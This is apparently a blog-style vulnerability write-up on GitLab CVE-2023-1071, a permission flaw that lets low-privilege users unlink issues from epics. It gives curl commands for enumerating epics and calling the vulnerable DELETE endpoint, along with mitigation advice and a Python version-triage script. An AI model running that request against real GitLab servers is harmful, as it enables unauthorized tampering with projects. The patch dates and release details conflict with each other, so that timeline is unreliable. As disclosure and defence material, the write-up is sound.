On February 23, 2023, a new security issue was quietly patched in GitLab, affecting a wide range of versions from 15.5 to 15.10.1. Registered as CVE-2023-1071, this flaw allows an unauthorized user to remove an issue from an Epic, breaking key project workflows and governance. This blog post digs deep into the how and why, including real-world impact, example exploit workflow, original references, and advice on staying safe.
Quick Summary
GitLab is a hugely popular open-source DevOps platform. It organizes work via Projects, Issues (tasks), and Epics (groups of Issues across projects, sub-epics, and more). Only authorized users are supposed to manage relationships between Issues and Epics.
But: Due to improper permission checks, *any logged-in user* (with just Guest access or less) could, under affected versions, remove an Issue from any Epic they could see—regardless of write/ownership rights.
Affected versions (from the advisory and the fixed releases listed below):
- 15.5 ≤ version < 15.8.5
- 15.9 ≤ version < 15.9.4
- 15.10 ≤ version < 15.10.1
If your server runs one of these, you’re at risk.
Why Does this Matter?
- Workflow sabotage: Unauthorized users could “un-glue” issues from Epics, making tracking and dashboards inaccurate.
- Compliance impact: Auditors and managers can’t trust completeness of Epic-to-Issue relationships.
- Trust loss: Even if the code isn’t stolen, organizational trust in what’s happening on GitLab erodes.
Under the Hood: The Root Cause
According to GitLab’s Security Release Note:
> “An improper permissions check allowed an authenticated user to remove an issue from an epic even if that user does not have permission to edit the epic.”
Digging into the original patch, the issue was an API endpoint (DELETE /groups/:id/epics/:epic_id/issues/:epic_issue_id) that failed to verify permissions before processing the removal.
Let’s see how an unauthorized user could exploit this. All you need is:
- Any user account (even “Guest” on a public project/group)
Step 1: Gather Info
Attackers can enumerate group, epic, and issue IDs using the normal GitLab web interface or API if visibility allows.
# Example: list epics in a group
curl --header "PRIVATE-TOKEN: <ATTACKER-TOKEN>" "https://gitlab.example.com/api/v4/groups/<group_id>/epics"
Now, invoke the vulnerable endpoint:
# Remove an Issue from an Epic using an unprivileged account
curl --request DELETE \
  --header "PRIVATE-TOKEN: <ATTACKER-TOKEN>" \
  "https://gitlab.example.com/api/v4/groups/<group_id>/epics/<epic_id>/issues/<epic_issue_id>"
Replace <group_id>, <epic_id>, and <epic_issue_id> with the actual IDs.
You can find epic_issue_id via the epics/issues API or by watching the browser’s network tab while viewing an Epic’s issue relationships.
> If successful, this request unlinks the Issue from the Epic, with no error—even though the attacker lacks removal or edit rights.
The Issue vanishes from the Epic—messing with project roadmap and reporting.
No admin notification, no history unless you know where to look.
How Was It Fixed?
GitLab engineers patched this by enforcing robust permission checks in the controller and API endpoint, ensuring that only users with the right to “admin” the Epic or Issue can de-link them.
Commit reference:
5fbf3498db86f468bc3d47c30e01935c42ec4bbe
Patch & Mitigation
- Upgrade now! If you’re running anything below 15.8.5, 15.9.4, or 15.10.1, update immediately.
- Audit epics: Review recent Epic changes for any suspicious/removal activity.
- Review permissions often: Least privilege is king. Don’t give more access than absolutely necessary!
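As an added example (not code from the advisory or from GitLab), here is a small Python check that compares a server’s reported version against the three fixed releases named above, so you can triage a fleet of instances quickly. It assumes each affected range starts at the .0 release of its minor line, and that the version string is the `version` field returned by GitLab’s `GET /api/v4/version` endpoint (e.g. "15.9.3-ee").

```python
import re
from typing import Dict, Iterable, List, Tuple

Version = Tuple[int, int, int]

# Affected ranges for CVE-2023-1071, taken from the write-up: each range runs
# from the start of the minor line (assumed .0) up to, but excluding, the
# fixed release (15.8.5, 15.9.4, 15.10.1). The earliest affected line is 15.5.
AFFECTED_RANGES: Tuple[Tuple[Version, Version], ...] = (
    ((15, 5, 0), (15, 8, 5)),
    ((15, 9, 0), (15, 9, 4)),
    ((15, 10, 0), (15, 10, 1)),
)


def parse_version(raw: str) -> Version:
    """Turn '15.9.3-ee', 'v15.9.3' or '15.9' into a (major, minor, patch) tuple.

    Edition suffixes such as '-ee' / '-ce' and a leading 'v' are ignored;
    a missing patch component is treated as .0.
    """
    match = re.match(r"^v?(\d+)\.(\d+)(?:\.(\d+))?", raw.strip())
    if not match:
        raise ValueError(f"unrecognised GitLab version string: {raw!r}")
    major, minor, patch = match.groups()
    return int(major), int(minor), int(patch or 0)


def is_affected(raw: str) -> bool:
    """True when the version falls inside any [start, fixed) range, i.e. lacks the fix."""
    version = parse_version(raw)
    return any(start <= version < fixed for start, fixed in AFFECTED_RANGES)


def triage(instances: Dict[str, str]) -> List[str]:
    """Given {hostname: version string}, return the hostnames that still need patching."""
    return sorted(host for host, raw in instances.items() if is_affected(raw))


if __name__ == "__main__":
    # Constructed sample inventory, as if collected from each instance's /api/v4/version.
    sample: Dict[str, str] = {
        "gitlab-prod.example.com": "15.9.3-ee",   # 15.9 line, below 15.9.4 -> affected
        "gitlab-stage.example.com": "15.10.1-ee",  # fixed release -> not affected
        "gitlab-legacy.example.com": "15.4.6-ce",  # before the 15.5 lower bound -> not affected
    }
    print("Needs patching:", triage(sample))
```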
NVD Entry for CVE-2023-1071:
https://nvd.nist.gov/vuln/detail/CVE-2023-1071
GitLab Security Release:
https://about.gitlab.com/releases/2023/02/23/critical-security-release-gitlab-15-8-5-released/
Patch Commit Details:
https://gitlab.com/gitlab-org/gitlab/-/commit/5fbf3498db86f468bc3d47c30e01935c42ec4bbe
API Docs for Epics and Issues:
https://docs.gitlab.com/ee/api/epics.html
Final Thoughts
CVE-2023-1071 is a reminder that even simple permission oversights can have a big impact on software supply chains and trust in DevOps tools. Patch early, patch often!
Stay safe. Do a permission and version check today!
*This article is original and crafted exclusively for you. If sharing, please cite the original sources and this write-up!*
Timeline
Published on: 04/05/2023 21:15:00 UTC
Last modified on: 04/12/2023 19:23:00 UTC